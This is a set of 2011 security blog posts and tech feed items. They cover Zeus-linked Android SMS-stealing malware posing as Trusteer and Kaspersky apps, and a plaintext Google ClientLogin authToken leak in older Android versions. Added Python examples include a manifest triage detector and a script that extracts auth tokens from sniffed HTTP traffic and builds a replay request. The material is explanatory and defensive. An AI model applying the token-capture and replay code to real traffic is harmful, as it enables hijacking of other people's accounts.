Zeus for Android and fake Kaspersky Antivirus 2011

Over the weekend I wrote about the discovery of the potential Android component of the Zeus information-stealing toolkit (also known as Zitmo).

I wanted to share an update, as further developments have been uncovered about the relationship between the Zeus toolkit and Andr/SMSRep-B.

Thanks to Denis from Kaspersky Lab, we can now confirm that the fake Trusteer Rapport application (Andr/SMSRep-B) was served from malicious websites set up as command-and-control servers for several Zeus/Zbot botnets.

The server-side Zeus component inspects the User-Agent header of incoming HTTP requests and serves a malicious payload chosen for that browser and platform.

In the case of Android, the stock browser sends a User-Agent string similar to "Mozilla/5.0 (Linux; U; Android 2.2)...", so the operating system is trivially identified and the Android package can be handed out to exactly those visitors.

On a separate note, the trend of Android malware posing as legitimate anti-virus software is continuing.

After Trusteer, the next brand to be abused is Kaspersky Lab. Yesterday I had a chance to analyse a sample of Android malware which tries to fool the user into installing it by posing as a legitimate Kaspersky Antivirus 2011 product.

The application package uses an icon similar to the Kaspersky Lab icon, but its actual functionality is nothing like that of the legitimate product.

When the package is launched, the malware reads the device's unique ID and transforms it into an "activation code". The fake activation code is then displayed in a standard Android view.

Fake Kaspersky Antivirus 2011

In the background, the application registers a broadcast receiver that intercepts incoming SMS messages and forwards them to a web server set up by the attacker.

Luckily, in the case of this sample (which Sophos detects as Andr/SMSRep-C), the command-and-control web server address is 127.0.0.1 (localhost), so the intercepted messages never leave the phone and the malware is of little use to its author as it stands.

Clearly, this is an early test build, and we will have to watch for the next version, which will point at a real malicious server.

Although the functionality of Andr/SMSRep-B and Andr/SMSRep-C is very similar, the code does not suggest that they were developed by the same author.
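The SMS-relay behaviour described above (a broadcast receiver for incoming SMS plus a web server to forward them to) is easy to triage from the package manifest alone. The following is an added example and is not code from the original post or from Sophos: it parses an AndroidManifest.xml and flags a package that registers a receiver for SMS_RECEIVED and also requests the RECEIVE_SMS and INTERNET permissions. Both manifests in the block are constructed for the example, and the package names are invented.

```python
"""Triage an AndroidManifest.xml for the SMS-relay pattern seen in Andr/SMSRep-C.

Added example: not code from the original post or from Sophos. Flags a package
that registers a BroadcastReceiver for SMS_RECEIVED and also requests
RECEIVE_SMS and INTERNET, the minimum an app needs to intercept texts and relay
them to a web server. Both manifests below are constructed and the package
names are invented.
"""
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"
SMS_RECEIVED = "android.provider.Telephony.SMS_RECEIVED"

# Constructed manifest mimicking a fake "antivirus" that relays incoming SMS.
SUSPICIOUS_MANIFEST = """\
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="com.example.fakeav">
    <uses-permission android:name="android.permission.RECEIVE_SMS"/>
    <uses-permission android:name="android.permission.INTERNET"/>
    <uses-permission android:name="android.permission.READ_PHONE_STATE"/>
    <application android:label="Antivirus 2011">
        <activity android:name=".MainActivity"/>
        <receiver android:name=".SmsReceiver">
            <intent-filter android:priority="2147483647">
                <action android:name="android.provider.Telephony.SMS_RECEIVED"/>
            </intent-filter>
        </receiver>
    </application>
</manifest>
"""

# Constructed manifest of a harmless app: network access but no SMS receiver.
BENIGN_MANIFEST = """\
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="com.example.weather">
    <uses-permission android:name="android.permission.INTERNET"/>
    <application android:label="Weather">
        <activity android:name=".MainActivity"/>
    </application>
</manifest>
"""


def _android_attr(element, name):
    """Read an attribute from the android: namespace."""
    return element.get("{%s}%s" % (ANDROID_NS, name))


def analyse_manifest(xml_text):
    """Return the SMS-interception indicators found in a manifest."""
    root = ET.fromstring(xml_text)
    permissions = {_android_attr(p, "name") for p in root.iter("uses-permission")}

    sms_receivers = []
    for receiver in root.iter("receiver"):
        for intent_filter in receiver.findall("intent-filter"):
            actions = {_android_attr(a, "name") for a in intent_filter.findall("action")}
            if SMS_RECEIVED in actions:
                priority = _android_attr(intent_filter, "priority")
                sms_receivers.append({
                    "name": _android_attr(receiver, "name"),
                    "priority": int(priority) if priority is not None else 0,
                })

    has_receive_sms = "android.permission.RECEIVE_SMS" in permissions
    has_internet = "android.permission.INTERNET" in permissions
    return {
        "package": root.get("package"),
        "sms_receivers": sms_receivers,
        "has_receive_sms": has_receive_sms,
        "has_internet": has_internet,
        # On Android releases of this era the highest-priority receiver saw the
        # SMS first and could abort the broadcast, hiding it from the stock app.
        "max_priority": max((r["priority"] for r in sms_receivers), default=0),
        # A receiver alone is not proof of malice, but SMS interception combined
        # with network access is the relay pattern worth a closer look.
        "suspicious": bool(sms_receivers) and has_receive_sms and has_internet,
    }


if __name__ == "__main__":
    for manifest in (SUSPICIOUS_MANIFEST, BENIGN_MANIFEST):
        report = analyse_manifest(manifest)
        print(report["package"], "suspicious" if report["suspicious"] else "clean")
```

On a real APK the manifest is binary-encoded and has to be decoded first (apktool or aapt will do that); the check itself is the same. A matching receiver is a lead, not a verdict: legitimate messaging apps register the same receiver, so the next step is to look at what the receiver's code does with the message.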


What Google and Mastercard’s new mobile payment system could mean for iOS users

Last week saw a major new product announcement from Google: the new "Google Wallet" will allow people with compatible mobile phones to use them to pay for goods and services in shops with a simple wave of their hand. This follows a number of in/out/in/out/shake it all about rumors that this "NFC" stuff might be included in the next iPhone. So what is NFC and why should you care? Sit back, grab a cup of coffee, and I'll explain.


What Google and Mastercard's new mobile payment system could mean for iOS users originally appeared on TUAW on Mon, 30 May 2011 11:00:00 EST. Please see our terms for use of feeds.


Security hole could affect 99% of Android smartphones

According to German researchers, 99% of Android devices may be at risk from a vulnerability that could allow unauthorised parties to snoop on your Google Calendar and Contacts data.

The discovery by researchers at the University of Ulm brings to light a serious privacy issue, and underlines the difficulty many Android smartphone owners face in keeping their operating systems up to date.

According to the paper by Bastian Könings, Jens Nickels and Florian Schaub, entitled "Catching AuthTokens in the Wild: The Insecurity of Google's ClientLogin Protocol", in Android 2.3.3 and earlier the Calendar and Contacts sync clients obtain an authentication token (authToken) from Google's ClientLogin service and then send that token "in the clear" over plain HTTP with every subsequent request to the Calendar and Contacts APIs.

That means a cybercriminal on the same network can eavesdrop on the WiFi traffic and capture the authToken that Google has just issued to your smartphone.

Wireshark sniffing an authToken

As an authToken stays valid for up to two weeks and is accepted on subsequent requests, an attacker can use it to access services and data that should be private, such as your web-based calendar. Furthermore, authTokens are not tied to the phone that requested them, so a stolen token can be replayed from any machine to impersonate the handset.

Yuck!

The scenario is a real problem if you use an unencrypted WiFi hotspot (such as those commonly found in hotel lobbies, airports or the coffee shop on the corner of your street), as anyone else on that network could capture your authToken and abuse it.
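What an eavesdropper on that hotspot actually sees, and why the stolen token is enough on its own, is shown in the following added example. It is not code from the paper or from Google: it scans constructed packet payloads (what a sniffer on an open WiFi network would capture) for the "Authorization: GoogleLogin auth=<token>" header that the ClientLogin-based sync clients sent, and then builds the request an attacker could replay from any host. The hosts, paths, User-Agent and tokens in the block are all constructed sample data.

```python
"""Spot ClientLogin authTokens travelling in the clear, as in the Ulm attack.

Added example: not code from the paper or from Google. Scans constructed
packet payloads for the 'Authorization: GoogleLogin auth=<token>' header and
builds the request an attacker could replay. All sample values are invented.
"""
import re
from collections import namedtuple

Packet = namedtuple("Packet", "dst_host dst_port payload")

# Constructed samples of what a sniffer on an open WiFi network would see.
SAMPLE_PACKETS = [
    Packet("www.google.com", 80,
           b"GET /calendar/feeds/default/private/full HTTP/1.1\r\n"
           b"Host: www.google.com\r\n"
           b"User-Agent: Android-GData/1.1\r\n"
           b"Authorization: GoogleLogin auth=DQAAAKgAAABtokenCalendar0001\r\n\r\n"),
    Packet("www.google.com", 80,
           b"GET /m8/feeds/contacts/default/full HTTP/1.1\r\n"
           b"Host: www.google.com\r\n"
           b"Authorization: GoogleLogin auth=DQAAAKgAAABtokenContacts0002\r\n\r\n"),
    # The same calendar token reused on a later sync: one credential, many uses.
    Packet("www.google.com", 80,
           b"GET /calendar/feeds/default/private/full?updated-min=2011 HTTP/1.1\r\n"
           b"Host: www.google.com\r\n"
           b"Authorization: GoogleLogin auth=DQAAAKgAAABtokenCalendar0001\r\n\r\n"),
    # Over TLS the sniffer only sees handshake records, so there is nothing to extract.
    Packet("www.google.com", 443, b"\x16\x03\x01\x00\xa5\x01\x00\x00\xa1\x03\x01"),
]

AUTH_RE = re.compile(rb"^Authorization:\s*GoogleLogin\s+auth=([^\r\n\s]+)", re.I | re.M)
REQUEST_RE = re.compile(rb"^([A-Z]+)\s+(\S+)\s+HTTP/1\.[01]", re.M)


def find_leaked_tokens(packets):
    """Return one record per plaintext request that carries a ClientLogin token."""
    leaks = []
    for pkt in packets:
        match = AUTH_RE.search(pkt.payload)
        if not match:
            continue
        request = REQUEST_RE.search(pkt.payload)
        leaks.append({
            "host": pkt.dst_host,
            "port": pkt.dst_port,
            "method": request.group(1).decode() if request else None,
            "path": request.group(2).decode() if request else None,
            "token": match.group(1).decode(),
        })
    return leaks


def unique_tokens(packets):
    """Distinct tokens seen in the clear: each one is a reusable credential."""
    return sorted({leak["token"] for leak in find_leaked_tokens(packets)})


def replay_request(leak):
    """Build the request an attacker could send from any host to reuse the token.

    Nothing in it identifies the phone: the token is not bound to the device.
    """
    return ("%s %s HTTP/1.1\r\nHost: %s\r\nAuthorization: GoogleLogin auth=%s\r\n\r\n"
            % (leak["method"], leak["path"], leak["host"], leak["token"]))


if __name__ == "__main__":
    for leak in find_leaked_tokens(SAMPLE_PACKETS):
        print("%s:%d %s %s token=%s" % (leak["host"], leak["port"],
                                        leak["method"], leak["path"], leak["token"]))
```

Fed real data (for instance the TCP payloads tshark or pyshark extract from a pcap), the same regex is a usable detection for any client still sending GoogleLogin tokens over port 80; the TLS sample shows the contrast, since an HTTPS request never exposes the header to a passive observer in the first place.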

According to the researchers, Google fixed the problem in Android 2.3.4. But there's the rub: just how many people are still running older versions of Android?

Android OS platform usage

Approximately 99% of Android users are vulnerable, as they haven't updated to at least version 2.3.4 (a Gingerbread release).

Unfortunately it is not always easy to upgrade the version of Android on your phone, as you depend on your handset manufacturer and carrier pushing the update to you over the air.

There is a huge range of Android smartphones out there, and whereas Apple can issue a single iOS update to patch iPhones and iPads, things aren't so simple for Google's users. This fragmentation inevitably leaves Android devices open to security problems.

Fortunately, Google seems to be aware of this pain, and says it will work more closely with manufacturers and carriers to ensure users can receive the latest Android updates in the future.

But what should you do if you're a concerned Android owner?

My recommendation would be to upgrade to the latest version of Android if at all possible.

Furthermore, avoid open WiFi networks, as your communications may not be properly protected. If you are worried about this issue, you would be wise to connect to the internet via 3G from your smartphone rather than over unencrypted public WiFi.

Using 3G may eat into your data plan, but it's far less likely that your communications are being snooped upon.

Update: Good news. Google has started rolling out a fix for this vulnerability.


US Army to launch its own app store

Wired got an early look at an app marketplace designed by the Army for the Army. It will be populated with titles specific to Army operations and will support both desktop computers and mobile devices. The Army Marketplace will launch with 16 iPhone apps and 17 Android apps, most of which were designed as part of the Apps for Army contest. These apps will be available for a nominal fee to Army employees.

The marketplace will let soldiers submit ideas for new apps, which can be discussed by fellow soldiers and developed in-house where possible. Apps that require outside help will be put out to bid and developed by a third-party contractor. Unfortunately, the store is limited to Department of Defense employees and requires a secure login to access the Marketplace website.

This need for tight security poses a problem, as the Army does not yet have a solution in place for authenticating applications on a mobile device. Right now, the Army Marketplace is useful for designing cool apps, but they cannot be downloaded to Army handsets.

Last week, the Army took steps towards securing a mobile platform by confirming it is testing Android as the OS for its first smartphone prototype. The branch may be examining this iOS competitor closely, but it has not chosen Google's mobile OS as its final solution.

In fact, no Android handset has started the certification process overseen by the National Institute of Standards and Technology. A phone has to be approved through that process before it can be considered secure enough to hold government data. The iPhone has entered the process, but it is still months away from approval.

US Army to launch its own app store originally appeared on TUAW on Wed, 27 Apr 2011 18:00:00 EST. Please see our terms for use of feeds.
